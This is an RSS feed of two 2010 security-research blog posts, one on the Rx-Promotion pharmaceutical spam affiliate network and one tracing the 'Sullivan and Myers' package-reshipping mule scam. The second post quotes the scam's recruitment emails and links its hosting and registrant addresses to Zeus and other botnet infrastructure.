<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>SecDev.cyber</title>
	<atom:link href="http://cyber.secdev.ca/feed/" rel="self" type="application/rss+xml" />
	<link>http://cyber.secdev.ca</link>
	<description>Securing Cyberspace</description>
	<lastBuildDate>Fri, 22 Apr 2011 01:21:18 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.1.1</generator>
		<item>
		<title>RX-promotion: A Pharma Shop</title>
		<link>http://cyber.secdev.ca/2010/12/rx-promotion-a-pharma-shop/</link>
		<comments>http://cyber.secdev.ca/2010/12/rx-promotion-a-pharma-shop/#comments</comments>
		<pubDate>Thu, 23 Dec 2010 15:15:35 +0000</pubDate>
		<dc:creator>nart</dc:creator>
				<category><![CDATA[SecDev.cyber Blog]]></category>
		<category><![CDATA[pharma]]></category>
		<category><![CDATA[spam]]></category>

		<guid isPermaLink="false">http://cyber.secdev.ca/?p=287</guid>
		<description><![CDATA[More than 65% of spam consists of &#8220;pharmaceutical spam&#8221; sent through a variety of well known spam botnets such as Rustock and Cutwail. These spam messages use multiple shop brands and sell a variety of drugs, especially Viagra. These pills, sometime fake pills, are shipped to buyers from pharma manufacturers, often in India or China. [...]]]></description>
			<content:encoded><![CDATA[<p>More than 65% of spam consists of &#8220;<a href="http://www.symantec.com/connect/blogs/pharmacy-spam-pharmaceutical-websites-fall-two-distinct-operations">pharmaceutical spam</a>&#8221; sent through a variety of well known spam botnets such as Rustock and Cutwail. These spam messages use multiple <a href="http://www.symantec.com/connect/blogs/new-pharmacy-spam-brand-spotted">shop brands</a> and sell a variety of drugs, especially Viagra. These pills, sometime <a href="http://blogs.cisco.com/security/largest-fake-pharmacy-spam-affiliate-program-closes/">fake pills</a>,  are <a href="http://behindonlinepharma.com/investigation/tracing-the-path-of-our-drugs">shipped to buyers</a> from pharma manufacturers, often in India or China.</p>
<p>There are <a href="http://www.fortiguard.com/analysis/canadianpharmacy.html">pharma campaigns</a> that have been found to use thousands of domain names and fast flux DNS techniques which can effectively resist takedown efforts. However, pharma operations are not just centralized campaigns. Much like <a href="http://us.trendmicro.com/imperia/md/content/us/trendwatch/researchandanalysis/unmasking_fakeav__june_2010_.pdf">FakeAV</a>, <a href="http://www.blackhat.com/presentations/bh-dc-10/Stevens_Kevin/BlackHat-DC-2010-Stevens-Underground-wp.pdf">Pay-Per-Install</a>, and <a href="http://blog.trendmicro.com/making-a-million%E2%80%94criminal-gangs-the-rogue-traffic-broker-and-stolen-clicks/">Pay-Per-Click</a> operations, pharma is also organized through affiliate networks. Affiliate networks allow centralized pharma operations to diversify with individual operators maintaining pharma websites and generating incoming traffic through spam or search engine optimization. </p>
<p>This post will focus on RX-promotion (rx-promotion.com) which has been <a href="http://krebsonsecurity.com/2010/05/following-the-money-part-ii/">linked</a> to a variety of operations including the payment service ChronoPay. The FDA are aware of Rx-promotion and have <a href="http://www.fda.gov/ICECI/EnforcementActions/WarningLetters/ucm229010.htm">sent </a> a warning letter to them in October 2010. Rather than focus on those behind the operation, this post simply focuses on how the affiliate program works and Rx-promotion&#8217;s pharma brands including:</p>
<p>The Canadian Rx Drugs &#8211; http://canadianrx-drugs.com/<br />
Meds Leader &#8211; Top Online Pharmacy Supplier &#8211; http://medicleader.com/<br />
Health-Refill &#8211; http://healthreorder.com/<br />
Men Drugs Shop &#8211; http://drugsshopformen.com/<br />
The US Drugs &#8211; http://the-us-drugs.com/<br />
Canadian Online Meds &#8211; http://canadianonlinemedicine.com/<br />
Trusted Meds Online &#8211; http://trusted-drugs-online.com/<br />
MedrugsPlus &#8211; http://med-drugs-plus.com/<br />
Internet Drugs Pedia &#8211; http://i-drugspedia.com/<br />
The Canadian Rx Drugs &#8211; http://herbiedrugs.com/<br />
Always Great &#8211; http://always-great.com/<br />
RXED On Green &#8211; http://rxed-on-green.com/<br />
StallionsRX &#8211; http://stallionsrx.com/<br />
Golden StethoScope &#8211; http://golden-stethoscope.com/<br />
Star Of Health &#8211; http://star-of-health.com/<br />
RX Pharmacy Center &#8211; http://rxpharmacy-center.com/<br />
Cheap Meds List &#8211; http://cheap-meds-list.com/<br />
Health Online Leader &#8211; http://health-online-leader.com/<br />
Drugs For Us &#8211; http://drugsforus.com/<br />
Meds For Us &#8211; http://meds-for-us.com/<br />
Great RX Pharmacy &#8211; http://great-rx-pharmacy.com/<br />
World Of Drugs &#8211; http://world-of-drugs.com/<br />
Number One Clinic &#8211; http://numberoneclinic.com/</p>
<p>It is actually quite simple to get started with a pharma affiliate operation and there are even guides that walk users through the process. After creating an account, one can download rx.tar.gz, a package that allows anyone to setup a pharma shop of their own. RX-promotion operates a number pharma brands that are available as themes after setting up the pharma shop. (<em>*See screen shots at the bottom of this post</em>).</p>
<p><a href="http://www.nartv.org/wp-content/uploads/2010/12/admin-themes.png"><img src="http://www.nartv.org/wp-content/uploads/2010/12/admin-themes-300x136.png" alt="" title="admin-themes" width="300" height="136" class="aligncenter size-medium wp-image-1881" /></a></p>
<p>Although the brand shops are operated by the affiliates, the shops are connected to the Rx-Promotion infrastructure which provides the backend for the prices, payment and support. The shops make HTTP connections to xml.paymentrx.com and receiving XML updates. Payments are handled through secure.paymentrx.com and customer support is available at rx-drugs-support.com.</p>
<p><a href="http://www.nartv.org/wp-content/uploads/2010/12/xml.png"><img src="http://www.nartv.org/wp-content/uploads/2010/12/xml-300x135.png" alt="" title="xml" width="300" height="135" class="aligncenter size-medium wp-image-1882" /></a></p>
<p>As orders are received, the affiliate earns money from Rx-Promotion and can &#8220;cash out&#8221; through a variety of services.</p>
<p><a href="http://www.nartv.org/wp-content/uploads/2010/12/payment.png"><img src="http://www.nartv.org/wp-content/uploads/2010/12/payment-300x160.png" alt="" title="payment" width="300" height="160" class="aligncenter size-medium wp-image-1884" /></a></p>
<p>There is ongoing development of the shop code. Affiliates can easily update their installations through the administrative backend.</p>
<p><a href="http://www.nartv.org/wp-content/uploads/2010/12/admin-update.png"><img src="http://www.nartv.org/wp-content/uploads/2010/12/admin-update-300x91.png" alt="" title="admin-update" width="300" height="91" class="aligncenter size-medium wp-image-1888" /></a></p>
<p>In one such update, Rx-Promotion left the &#8220;./svn/&#8221; directory from the subversion revision control system indicating that their source code and development resides at:</p>
<blockquote>
<p>https://nona.smartsol.biz/svn/src/rxpro_shop/public_html</p>
</blockquote>
<p>RX-promotion is behind many different pharma brands that are marketed using spam and search engine optimization techniques. RX-promotion provides the backend of the pharma operation while numerous affiliates promote its products in order to receive a portion of the profit generated. </p>
<p>Screenshots of the various pharma brand themes available is the Rx-Promotion shop code:</p>
<p>Always_great<br />
<a href="http://www.nartv.org/wp-content/uploads/2010/12/Always_great-Screenshot.png"><img src="http://www.nartv.org/wp-content/uploads/2010/12/Always_great-Screenshot-300x134.png" alt="" title="Always_great-Screenshot" width="300" height="134" class="aligncenter size-medium wp-image-1916" /></a><br />
</p>
<p>Bench_in_a_park<br />
<a href="http://www.nartv.org/wp-content/uploads/2010/12/Bench_in_a_park-Screenshot.png"><img src="http://www.nartv.org/wp-content/uploads/2010/12/Bench_in_a_park-Screenshot-300x134.png" alt="" title="Bench_in_a_park-Screenshot" width="300" height="134" class="aligncenter size-medium wp-image-1893" /></a><br />
</p>
<p>Bondi_blue<br />
<a href="http://www.nartv.org/wp-content/uploads/2010/12/Bondi_blue-Screenshot.png"><img src="http://www.nartv.org/wp-content/uploads/2010/12/Bondi_blue-Screenshot-300x134.png" alt="" title="Bondi_blue-Screenshot" width="300" height="134" class="aligncenter size-medium wp-image-1894" /></a><br />
</p>
<p>Brushy<br />
<a href="http://www.nartv.org/wp-content/uploads/2010/12/Brushy-Screenshot.png"><img src="http://www.nartv.org/wp-content/uploads/2010/12/Brushy-Screenshot-300x134.png" alt="" title="Brushy-Screenshot" width="300" height="134" class="aligncenter size-medium wp-image-1895" /></a><br />
</p>
<p>canadianonline-lucky<br />
<a href="http://www.nartv.org/wp-content/uploads/2010/12/canadianonline-lucky-Screenshot.png"><img src="http://www.nartv.org/wp-content/uploads/2010/12/canadianonline-lucky-Screenshot-300x135.png" alt="" title="canadianonline-lucky-Screenshot" width="300" height="135" class="aligncenter size-medium wp-image-1896" /></a><br />
</p>
<p>canadianonline<br />
<a href="http://www.nartv.org/wp-content/uploads/2010/12/canadianonline-Screenshot.png"><img src="http://www.nartv.org/wp-content/uploads/2010/12/canadianonline-Screenshot-300x135.png" alt="" title="canadianonline-Screenshot" width="300" height="135" class="aligncenter size-medium wp-image-1897" /></a><br />
</p>
<p>canadianrxdrugs<br />
<a href="http://www.nartv.org/wp-content/uploads/2010/12/canadianrxdrugs-Screenshot.png"><img src="http://www.nartv.org/wp-content/uploads/2010/12/canadianrxdrugs-Screenshot-300x135.png" alt="" title="canadianrxdrugs-Screenshot" width="300" height="135" class="aligncenter size-medium wp-image-1898" /></a><br />
</p>
<p>drugspedia<br />
<a href="http://www.nartv.org/wp-content/uploads/2010/12/drugspedia-Screenshot.png"><img src="http://www.nartv.org/wp-content/uploads/2010/12/drugspedia-Screenshot-300x132.png" alt="" title="drugspedia-Screenshot" width="300" height="132" class="aligncenter size-medium wp-image-1899" /></a><br />
</p>
<p>Golden_sthetoscope<br />
<a href="http://www.nartv.org/wp-content/uploads/2010/12/Golden_sthetoscope-Screenshot.png"><img src="http://www.nartv.org/wp-content/uploads/2010/12/Golden_sthetoscope-Screenshot-300x134.png" alt="" title="Golden_sthetoscope-Screenshot" width="300" height="134" class="aligncenter size-medium wp-image-1900" /></a><br />
</p>
<p>healthrefill<br />
<a href="http://www.nartv.org/wp-content/uploads/2010/12/healthrefill-Screenshot.png"><img src="http://www.nartv.org/wp-content/uploads/2010/12/healthrefill-Screenshot-300x134.png" alt="" title="healthrefill-Screenshot" width="300" height="134" class="aligncenter size-medium wp-image-1901" /></a><br />
</p>
<p>Kettlebell<br />
<a href="http://www.nartv.org/wp-content/uploads/2010/12/Kettlebell-Screenshot.png"><img src="http://www.nartv.org/wp-content/uploads/2010/12/Kettlebell-Screenshot-300x135.png" alt="" title="Kettlebell-Screenshot" width="300" height="135" class="aligncenter size-medium wp-image-1902" /></a><br />
</p>
<p>Life_meant_to_be<br />
<a href="http://www.nartv.org/wp-content/uploads/2010/12/Life_meant_to_be-Screenshot.png"><img src="http://www.nartv.org/wp-content/uploads/2010/12/Life_meant_to_be-Screenshot-300x135.png" alt="" title="Life_meant_to_be-Screenshot" width="300" height="135" class="aligncenter size-medium wp-image-1903" /></a><br />
</p>
<p>Loose_weight_orangy<br />
<a href="http://www.nartv.org/wp-content/uploads/2010/12/Loose_weight_orangy-Screenshot.png"><img src="http://www.nartv.org/wp-content/uploads/2010/12/Loose_weight_orangy-Screenshot-300x134.png" alt="" title="Loose_weight_orangy-Screenshot" width="300" height="134" class="aligncenter size-medium wp-image-1904" /></a><br />
</p>
<p>medsdrugsplus<br />
<a href="http://www.nartv.org/wp-content/uploads/2010/12/medsdrugsplus-Screenshot.png"><img src="http://www.nartv.org/wp-content/uploads/2010/12/medsdrugsplus-Screenshot-300x134.png" alt="" title="medsdrugsplus-Screenshot" width="300" height="134" class="aligncenter size-medium wp-image-1905" /></a><br />
</p>
<p>medsleader<br />
<a href="http://www.nartv.org/wp-content/uploads/2010/12/medsleader-Screenshot.png"><img src="http://www.nartv.org/wp-content/uploads/2010/12/medsleader-Screenshot-300x134.png" alt="" title="medsleader-Screenshot" width="300" height="134" class="aligncenter size-medium wp-image-1906" /></a><br />
</p>
<p>mensdrugs<br />
<a href="http://www.nartv.org/wp-content/uploads/2010/12/mensdrugs-Screenshot.png"><img src="http://www.nartv.org/wp-content/uploads/2010/12/mensdrugs-Screenshot-300x134.png" alt="" title="mensdrugs-Screenshot" width="300" height="134" class="aligncenter size-medium wp-image-1907" /></a><br />
</p>
<p>Modry<br />
<a href="http://www.nartv.org/wp-content/uploads/2010/12/Modry-Screenshot.png"><img src="http://www.nartv.org/wp-content/uploads/2010/12/Modry-Screenshot-300x135.png" alt="" title="Modry-Screenshot" width="300" height="135" class="aligncenter size-medium wp-image-1908" /></a><br />
</p>
<p>Mostly_laconic<br />
<a href="http://www.nartv.org/wp-content/uploads/2010/12/Mostly_laconic-Screenshot.png"><img src="http://www.nartv.org/wp-content/uploads/2010/12/Mostly_laconic-Screenshot-300x134.png" alt="" title="Mostly_laconic-Screenshot" width="300" height="134" class="aligncenter size-medium wp-image-1909" /></a><br />
</p>
<p>Red_on_green<br />
<a href="http://www.nartv.org/wp-content/uploads/2010/12/Red_on_green-Screenshot.png"><img src="http://www.nartv.org/wp-content/uploads/2010/12/Red_on_green-Screenshot-300x134.png" alt="" title="Red_on_green-Screenshot" width="300" height="134" class="aligncenter size-medium wp-image-1910" /></a><br />
</p>
<p>StallionsRx<br />
<a href="http://www.nartv.org/wp-content/uploads/2010/12/StallionsRx-Screenshot.png"><img src="http://www.nartv.org/wp-content/uploads/2010/12/StallionsRx-Screenshot-300x134.png" alt="" title="StallionsRx-Screenshot" width="300" height="134" class="aligncenter size-medium wp-image-1911" /></a><br />
</p>
<p>Star_of_health<br />
<a href="http://www.nartv.org/wp-content/uploads/2010/12/Star_of_health-Screenshot.png"><img src="http://www.nartv.org/wp-content/uploads/2010/12/Star_of_health-Screenshot-300x133.png" alt="" title="Star_of_health-Screenshot" width="300" height="133" class="aligncenter size-medium wp-image-1912" /></a><br />
</p>
<p>theusdrugs-luckymax<br />
<a href="http://www.nartv.org/wp-content/uploads/2010/12/theusdrugs-luckymax-Screenshot.png"><img src="http://www.nartv.org/wp-content/uploads/2010/12/theusdrugs-luckymax-Screenshot-300x135.png" alt="" title="theusdrugs-luckymax-Screenshot" width="300" height="135" class="aligncenter size-medium wp-image-1913" /></a><br />
</p>
<p>theusdrugs<br />
<a href="http://www.nartv.org/wp-content/uploads/2010/12/theusdrugs-Screenshot.png"><img src="http://www.nartv.org/wp-content/uploads/2010/12/theusdrugs-Screenshot-300x134.png" alt="" title="theusdrugs-Screenshot" width="300" height="134" class="aligncenter size-medium wp-image-1914" /></a><br />
</p>
<p>trustedmeds<br />
<a href="http://www.nartv.org/wp-content/uploads/2010/12/trustedmeds-Screenshot.png"><img src="http://www.nartv.org/wp-content/uploads/2010/12/trustedmeds-Screenshot-300x134.png" alt="" title="trustedmeds-Screenshot" width="300" height="134" class="aligncenter size-medium wp-image-1915" /></a></p>
]]></content:encoded>
			<wfw:commentRss>http://cyber.secdev.ca/2010/12/rx-promotion-a-pharma-shop/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Pack Mules: The Re-Shipping Fraud &amp; Malware Connection</title>
		<link>http://cyber.secdev.ca/2010/12/pack-mules-the-re-shipping-fraud-malware-connection/</link>
		<comments>http://cyber.secdev.ca/2010/12/pack-mules-the-re-shipping-fraud-malware-connection/#comments</comments>
		<pubDate>Thu, 16 Dec 2010 16:42:04 +0000</pubDate>
		<dc:creator>nart</dc:creator>
				<category><![CDATA[SecDev.cyber Blog]]></category>
		<category><![CDATA[fraud]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[zeus]]></category>

		<guid isPermaLink="false">http://cyber.secdev.ca/?p=282</guid>
		<description><![CDATA[Malware toolkits are designed to steal information, such as bank account data, and provide cyber criminals with vast quantities of stolen credentials. Every day, credit card numbers stolen by malware such as Zeus and SpyEye are bought and sold in the underground economy. This has given rise to the recruitment of &#8220;pack mules.&#8221; When using [...]]]></description>
			<content:encoded><![CDATA[<p>Malware toolkits are designed to steal information, such as bank account data, and provide cyber criminals with vast quantities of stolen credentials. Every day, credit card numbers stolen by malware such as <a href="http://us.trendmicro.com/imperia/md/content/us/trendwatch/researchandanalysis/zeusapersistentcriminalenterprise.pdf">Zeus</a> and <a href="http://www.malwareint.com/docs/spyeye-analysis-en.pdf">SpyEye</a> are <a href="http://krebsonsecurity.com/2010/09/ill-take-2-mastercards-and-a-visa-please/">bought and sold</a> in the <a href="http://chess.eecs.berkeley.edu/pubs/772/cardenas_2009.pdf">underground economy</a>. This has given rise to the recruitment of &#8220;<a href="http://blogs.rsa.com/rsafarl/deep-inside-a-reshipping-scam-mules-victimized-by-air-parcel-express/">pack mules</a>.&#8221; </p>
<p>When using stolen credit card numbers to make purchases online, criminals do not provide their own identity or location information. Instead, criminals post advertisements on job search Web sites in order to lure &#8220;pack mules&#8221; to act as intermediaries in their criminal operations. These intermediaries receive merchandise on the criminal&#8217;s behalf and re-ship it to a location under the control of the criminals. This operation is known as &#8220;re-shipping fraud&#8221; and is similar to the ways in which some criminals recruit &#8220;<a href="http://krebsonsecurity.com/2010/05/fbi-promises-action-against-money-mules/">money</a> <a href="http://krebsonsecurity.com/2010/09/a-one-stop-money-mule-fraud-shop/">mules</a>&#8221; to open bank accounts for transferring stolen funds.</p>
<p>Re-shipping is tightly intertwined with malware activity. This is demonstrated by the fact that the Web sites used to recruit pack mules are <a href="http://ddanchev.blogspot.com/2009/12/celebrity-themed-scareware-campaign_07.html">hosted on the same servers</a> that host the command-and-control servers of Zeus botnets. I have been exploring (see Clustering Zeus Command and Control Servers <a href="http://www.nartv.org/2010/10/14/clustering-zeus-command-and-control-servers/">Part 1</a> and <a href="http://www.nartv.org/2010/11/05/clustering-zeus-command-and-control-servers-part-2/">Part 2</a>) clusters of Zeus activity in an attempt to better understand the connections among the criminals behind different functions within the <a href="http://www.securelist.com/en/analysis?pubid=204792095">botnet ecosystem</a>. I have found that although Zeus is a popular malware toolkit that any aspiring criminal can use to setup a botnet capable of stealing credit card and banking information, there is a cluster of malicious Zeus servers which indicate that there is a &#8220;core&#8221; of Zeus operations. </p>
<p>In this blog post, I analyze the pack mule recruiting Web site, &#8220;Sullivan and Myers,&#8221; (sullivanmyers.com) and explore its links with Zeus botnets and the broader malware underground. This investigation indicates that these concentrations of malicious activities go beyond operating command-and-control servers and extracting banking information to other aspects of the criminal enterprise. This includes exploitation (through &#8220;<a href="http://blogs.mcafee.com/mcafee-labs/an-overview-of-exploit-packs">exploit packs</a>&#8220;) and the recruiting of pack and money mules. </p>
<p><strong>Pack Mule Recruitment</strong></p>
<p>In order to recruit pack mules, criminals setup Web sites that purport to belong to a legitimate shipping and receiving business, and post advertisements that link to the &#8220;business&#8221; on job search Web sites and forums. This can be seen in the case of Sullivan and Myers, a fake business created for the purpose of recruiting pack mules. </p>
<p><a href="http://www.infowar-monitor.net/wp-content/uploads/2010/12/pack_ad.png"><img src="http://www.infowar-monitor.net/wp-content/uploads/2010/12/pack_ad-300x160.png" alt="" title="pack_ad" width="300" height="160" class="aligncenter size-medium wp-image-6709" /></a></p>
<p>Sullivan and Myer&#8217;s job posting invites interested applicants to complete an online application form and submit a resume to hr@sullivanmyers.com. Sullivan and Myer’s contact information (address, phone, and fax number) is also supplied. The application form, contact information, and the company&#8217;s Web site appear to have been designed to create a sense of legitimacy. Although there are some indicators that suggest the company may be fake, such as awkward language and occasional errors (using &#8220;Myers &#038; Sullivan&#8221; instead of  &#8220;Sullivan and Myers&#8221;), the overall presentation is passable. To some applicants, the company may appear to be legitimate. </p>
<p><a href="http://www.infowar-monitor.net/wp-content/uploads/2010/12/pack_sull.png"><img src="http://www.infowar-monitor.net/wp-content/uploads/2010/12/pack_sull-300x278.png" alt="" title="pack_sull" width="300" height="278" class="aligncenter size-medium wp-image-6710" /></a></p>
<p>After submitting a resume, applicants are given additional information about the position. The applicants are informed that they will be receiving packages which they are to re-package and send to the company&#8217;s &#8220;consumers.&#8221; The applicants are told that they can earn up to USD3000 per month.</p>
<blockquote><p>
Human Resource hr@sullivanmyers.com</p>
<p>Your documents has been verified and checked; you seem to be a suitable<br />
candidate for Junior Packing Specialists&#8217; position and we are glad, that you are<br />
interested in this opening.</p>
<p>Following, you&#8217;ll find information about Sullivan &#038; Myers and additional details<br />
about Junior Packing Specialist position. </p>
<p>Sullivan &#038; Myers (NASDAQ: SUM) is a well known printing and typography company<br />
that offers wide variety of printing, publishing and general advertising<br />
services. Company is based in US with headquarters in GA, Atlanta. If you want<br />
to find out more about Sullivan &#038; Myers, please visit our web site<br />
www.sullivanmyers.com</p>
<p>This is a part-time job with a flexible schedule. Work time is not<br />
limited, but to be successful you need to devote at least 10hrs per week to it,<br />
though those who work up to 20hr/week have best results in the company. </p>
<p> This is a part-time job and it can be rendered at home, thus all but few </p>
<p>communications will be handled online, because of this job requirements include<br />
acceptable level of computer literacy and Internet access.  There is no entrance<br />
or any other hidden fee. The company covers all the fees related to this<br />
employment.</p>
<p>Junior packing specialist&#8217;s job is quite simple, currently Sullivan &#038; Myers<br />
provide a complex package of services for a network of a well-known consumer&#8217;s<br />
electronics company, you will be receiving scheduled packages from them. The<br />
parcels mostly consist of electronics and consumer goods with no oversized<br />
deliveries. You shall receive a specialized packing paper from Sullivan &#038; Myers<br />
or its affiliates, part of it will be a decal paper, picturing different<br />
advertisements from our client&#8217;s partner, some might only be protective wrapping<br />
to provide additional security to fragile goods. Junior Packing specialist&#8217;s job<br />
is simple, you need to repack each package &#038; parcel and make sure that<br />
consistence of package is fully operational or/and lacking visual defects and<br />
forward it to consumers via USPS or FED EX. You might receive up to 10 packages<br />
per week (during your trial period) thus as we already mentioned we require at<br />
least 10hrs to be dedicated to this job. </p>
<p>To the successful applicants we offer a position on a trial period (30<br />
business days, from the first actual assignment). This is the period when you<br />
will be trained and shall receive 24/7 online and phone support, while earning<br />
money. The evaluation of employees on a trial period is usually at least one<br />
week before the end of their trial period. During the trial period, the<br />
supervisor can recommend termination. At the end of the trial period, supervisor<br />
makes his decision.  </p>
<p>The trial period is paid $1390 USD per month. For every successful mail/parcel<br />
forwarded you will receive $35, also you shall receive an additional bonus of<br />
$15 per parcel that you send at the day of delivery, for example, if you have<br />
received a parcel at 01.05.2010 and forwarded it at the same day, you shall<br />
receive not $35 but $50  commission. Your total income, with the current volume<br />
of clients, will be added up to $3000 USD per month. Your base salary, after<br />
trial period, will go up to $1900 per month, plus $45 per parcel you forward. </p>
<p>You may ask for additional hours after trial period, or proceed full-time.<br />
If you are interested in this job, please reply to this e-mail and our HR<br />
managers will send you all required paperwork.
</p></blockquote>
<p>Next, applicants are sent a contract and are then instructed to send copies of identification and proof of residency for a background check to minimize fraud. This is an important step because if, at a later point, the applicant determines that the company is not legitimate and wants to quit, the criminals behind this operation could attempt identity theft or otherwise compromise the individual.</p>
<blockquote><p>
Human Resource hr@sullivanmyers.com:</p>
<p>In this e-mail, you will find attached legal document specifically a labor<br />
contract for Junior Packing Specialist position in Sullivan &#038; Myers.</p>
<p>Make sure you read it carefully, familiarize yourself with all aspects of<br />
the agreement and in case if you agree with the terms do the following:</p>
<p>1.        Print out two (2) copies of the labor contract.<br />
2.        Sign both parts, you must sign it on the bottom of EVERY page,<br />
plus at the end of the document.<br />
3.        Forward one part to Sullivan &#038; Myers HR department at<br />
hr@sullivanmyers.com or fax it to 1-(678)-866-2530<br />
4.        Keep one signed copy for yourself.</p>
<p>The contract becomes valid from the moment of the reception of the<br />
correctly filled copy of the contract. It should be noted that the validity<br />
of the contract in the electronic form is identical to the contract signed<br />
in personal presence of both parties.</p>
<p>In order to minimize fraudulent activities we have implemented strong<br />
security policy, we are running mandatory background checks for every<br />
successful candidate. Background check includes but is not limited to,<br />
criminal, financial or personal records that are available publicly. In VERY<br />
rare cases, Sullivan &#038; Myers may enforce PI. As a part of our security<br />
policy we ask you to make an electronic copy of your ID, driving license or<br />
any other legal document that may verify your identity (any utility bill<br />
will do, if your domicile is mentioned there) and send it attached with the<br />
same e-mail or fax it to 1-(678)-866-2530.</p>
<p>You will receive additional information when your forwarded contract will<br />
be examined and verified by our attorneys.</p>
<p>*NOTE: Requires manual signature.
</p></blockquote>
<p>After receiving the signed contract, the criminals confirm the mailing address of the new &#8220;employee.&#8221; At this point, the new employee will begin receiving packages of goods bought with stolen credit card information and forwarding these goods to the criminals behind the operation. When law enforcement tracks down the operation, they will be led to the address of the pack mule rather than the masterminds behind the operation.</p>
<p><strong>The Malware Connection</strong></p>
<p>Locating Sullivan and Myers within the malware ecosystem exposes the criminal connections of those behind the re-shipping fraud operation. The Web site sullivanmyers.com is registered to the e-mail address migray71@yahoo.com and resolves to the IP address 194.28.112.11. Migray71@yahoo.com is linked to significant <a href="http://www.malwaredomainlist.com/mdl.php?search=migray71%40yahoo.com&#038;colsearch=All&#038;quantity=All&#038;inactive=on">malicious activity</a>.</p>
<p>The hosting history of sullivanmyers.com firmly places the domain within concentrations of malicious activity. Currently, the Web site is hosted on a server with the IP address 194.28.112.11. This server also hosts azkinternational.com  (azkint@bronzemail.net), fotosharedownloads.com (hosting@haiau.tv) and fotoshare-dknc.com (markson@bluewin.ch). Fotosharedownloads.com and fotoshare-dknc.com are Web sites that host malware, and azkinternational.com appears to be another pack mule recruiting Web site.</p>
<p>Sullivanmyers.com has been hosted on a number of servers that have hosted significant amounts of malicious activity in the last year. Currently, these servers are hosting domain names registered to known malicious e-mail addresses.</p>
<p>2010-11-06 	223.25.242.61</p>
<p>- binmop.com &#8211; migray71@yahoo.com<br />
- glazsystem.net &#8211; annepark@gmail.com<br />
- nonameal.com &#8211; descartez@hotmail.com<br />
- unknownplaces.net &#8211; mcthomas34@first-host.net</p>
<p>2010-09-24 	27.131.32.153</p>
<p>- antiviruslab.info &#8211; mcthomas34@first-host.net<br />
- bransac.com &#8211; descartez@hotmail.com<br />
- myweb-analytics.net &#8211; migray71@yahoo.com<br />
- organte.com &#8211; ddgrimes@earthlink.net</p>
<p>2010-09-13 	113.11.194.158</p>
<p>- trackingcounter.net &#8211; trackingcounter.net@protecteddomainservices.com</p>
<p>2010-07-03 	113.11.194.148</p>
<p>- baidum.net &#8211; edgar.marcha@verizon.net<br />
- hpnet.in &#8211; socks5service@list.ru<br />
- kiaz.org &#8211; analizsite@gmail.com<br />
- kingolat.com &#8211; ddgrimes@earthlink.net<br />
- mainspain.info &#8211; edgar.marcha@verizon.net<br />
- maturesdf.com &#8211; MillieDiaz4@aol.com<br />
- southdomens.com &#8211; southdomens@googlemail.com<br />
- tarstall.ru  &#8211; boats@qx8.ru<br />
- topmilkyway.net &#8211; ddgrimes@earthlink.net<br />
- truetry.org &#8211; analizsite@gmail.com<br />
- vuvuzelya.net &#8211; edgar.marcha@verizon.net</p>
<p>The domain names listed above resolve to IP addresses of servers that were previously used to host sullivanmyers.com. While some of the domain names have already been linked to malicious activity, some have not. However, they are associated with e-mail addresses that have been used to register malicious domain names in the past. </p>
<p><a href="http://www.infowar-monitor.net/wp-content/uploads/2010/12/pack_migray.png"><img src="http://www.infowar-monitor.net/wp-content/uploads/2010/12/pack_migray-300x182.png" alt="" title="pack_migray" width="300" height="182" class="aligncenter size-medium wp-image-6711" /></a></p>
<p>Using data from <a href="http://www.malwaredomainlist.com/">MalwareDomainList</a> and <a href="https://zeustracker.abuse.ch/">ZeusTracker</a>, we can see the extent to which domain names registered by migray71@yahoo.com are engaged in malicious behavior and linked through co-hosting to other malicious domain names. These malicious domain names have been active throughout 2010 and have been used to host exploit packs, such as Pheonix and Eleonore; downloaders, such as Oficla/Sasfis, Fake Antivirus, the RussKill DDoS tool and multiple versions of the Zeus Trojan; and associated drop zones and command-and-control servers. This e-mail address was also used to register sosanni.com, a command-and-control server for the <a href="http://www.nartv.org/2010/08/04/the-ambler-botnet/">Ambler botnet</a>.</p>
<p><a href="http://www.infowar-monitor.net/wp-content/uploads/2010/12/pack_bananas.png"><img src="http://www.infowar-monitor.net/wp-content/uploads/2010/12/pack_bananas_s.png" alt="" title="pack_bananas_s" width="300" height="183" class="aligncenter size-full wp-image-6713" /></a></p>
<p>The most interesting connection within this cluster links the activity of domain names registered with migray71@yahoo.com to the Ambler botnet and to a <a href="http://www.nartv.org/2010/11/05/clustering-zeus-command-and-control-servers-part-2/">cluster of malicious Zeus activity</a>. The domain name sosanni.com (migray71@yahoo.com – 121.101.216.205) was an Ambler command-and-control server that was operated by the same set of actors that administered a cluster of Zeus command-and-control servers registered with a variety of well- known e-mail addresses, including hilarykneber@yahoo.com, edgar.marcha@verizon.net, and MillieDiaz4@aol.com. </p>
<p>The hilarykneber@yahoo.com e-mail address was made infamous after <a href="http://www.netwitness.com/resources/kneber.aspx">Netwitness</a> revealed the existence of a Zeus-based botnet associated with that email address that had compromised over 74,000 computers around the world. An association with the Kneber botnet indicates that those behind the operation have no shortage of stolen credit card numbers that could be used to make purchases that are re-shipped through the pack mule operation. Moreover, this <a href="http://www.nartv.org/2010/11/05/clustering-zeus-command-and-control-servers-part-2/">cluster</a> was found to be not only operating a Zeus botnet, but a <a href="http://www.nartv.org/2010/06/09/a-random-walk-through-the-malware-ecosystem/">SpyEye</a> and the <a href="http://www.nartv.org/2010/08/04/the-ambler-botnet/">Ambler botnet</a> as well. This indicates that the criminals are diversifying their operations using multiple forms of malware that are designed to steal credit card numbers, bank account information, and other credentials.</p>
<p>However, there are some limitations to this analysis. Just because domain names are hosted on the same server, it does not mean that there is necessarily a direct connection between them. There are a variety of &#8220;<a href="https://www.infosecisland.com/blogview/4487-Bullet-Proof-Hosting-A-Theoretical-Model.html">bullet proof</a>&#8221; Web hosting companies that provide stable hosting to a wide variety of malicious activity. Online criminal prefer these services because the &#8220;bullet proof&#8221; hosts ensure that malicious Web sites remain online despite efforts of the security community to take them down.</p>
